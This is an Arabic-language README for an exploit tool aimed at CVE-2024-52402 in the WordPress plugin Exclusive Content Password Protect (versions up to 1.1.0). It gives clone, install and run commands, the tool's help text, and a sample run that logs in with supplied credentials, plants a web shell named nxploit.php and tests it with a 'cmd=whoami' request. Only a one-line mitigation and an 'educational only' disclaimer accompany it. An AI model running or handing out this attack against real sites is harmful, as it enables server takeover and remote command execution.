
إضافة WordPress Exclusive Content Password Protect <= 1.1.0 - ثغرة CSRF تؤدي إلى رفع ملفات تعسفي
يستهدف هذا الاستغلال ثغرة تزوير الطلبات عبر المواقع (CSRF) في إضافة Exclusive Content Password Protect في WordPress، بالإصدارات حتى 1.1.0 وما يشملها. تتيح هذه الثغرة للمهاجم رفع Web Shell إلى خادم الويب، مما قد يؤدي إلى تنفيذ أكواد برمجية عن بُعد.
لاستغلال هذه الثغرة، يجب توفير رابط موقع WordPress المستهدف واسم مستخدم وكلمة مرور صالحين. سيسجل سكربت الاستغلال الدخول إلى موقع WordPress ويحاول رفع Web Shell.
python CVE-2024-52402.py -u <target> -un <username> -p <password>
usage: CVE-2024-52402.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for ECVE-2024-52402 By | Nxploit, Khaled ALenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-un, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
[+] Plugin version detected: 1.1.0
[+] Logged in successfully.
[!] Exploit completed! Web Shell uploaded: http://target/wordpress/wp-content/uploads/nxploit.php
[*] Test with: http://target/wordpress/wp-content/uploads/nxploit.php?cmd=whoami
يستغل هذا السكربت ثغرة CSRF في إضافة Exclusive Content Password Protect لرفع Web Shell إلى خادم WordPress. ومع ذلك، فهو لا ينفذ هجوم CSRF بشكل مباشر؛ بل يركز على استغلال وظيفة رفع الملفات في الإضافة لتحقيق الاستغلال.
استنساخ المستودع
git clone https://github.com/Nxploited/CVE-2024-52402.git
cd CVE-2024-52402
تثبيت المتطلبات
تأكد من تثبيت مكتبة requests:
pip install requests
تشغيل السكربت استخدم الأمر التالي لتنفيذ السكربت:
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
للتخفيف من هذه الثغرة، قم بتحديث إضافة Exclusive Content Password Protect إلى أحدث إصدار حيث تم إصلاح هذه المشكلة.
هذا السكربت مخصص للأغراض التعليمية فقط. الاستخدام غير المصرح به لهذا السكربت ضد أنظمة ليس لديك إذن صريح لاختبارها يعد غير قانوني وغير أخلاقي.
الاستغلال بواسطة: Nxploit، Khaled alenazi.